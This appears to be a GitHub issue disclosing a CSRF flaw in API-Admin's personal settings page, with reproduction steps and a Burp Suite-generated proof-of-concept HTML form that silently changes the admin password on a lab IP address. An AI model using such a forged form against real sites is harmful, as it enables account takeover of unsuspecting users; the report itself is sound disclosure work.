API-Admin icon indicating copy to clipboard operation
API-Admin copied to clipboard

Published 20 hours ago verified publisher icon 5ime

There is a CSRF vulnerability in the personal settings

Open aQme opened this issue 1 year ago • 0 comments

  1. First, log in to the background, click Personal Settings. There is no captcha here and there is no requirement to verify the old password, try CSRF. personalsettings

  2. Then, feel free to enter a password, for example '777777', click submit, and grab the packet in Burpsuite. updatesuccess

  3. Use the packet of the second step to generate a CSRF POC, and then visit the CSRF page in the same browser.
    CSRF POC

     <html>
     <!-- CSRF PoC - generated by Burp Suite Professional -->
     <body>
     <script>history.pushState('', '', '/')</script>
         <form action="http://192.168.190.137/admin/index/editUserinfo" method="POST">
             <input type="hidden" name="username" value="admin" />
             <input type="hidden" name="password" value="777777" />
             <input type="hidden" name="email" value="123&#64;qq&#46;com" />
             <input type="submit" value="Submit request" />
         </form>
     </body>
 </html>

csrfpoc changesuccess

aQme avatar Apr 19 '23 07:04 aQme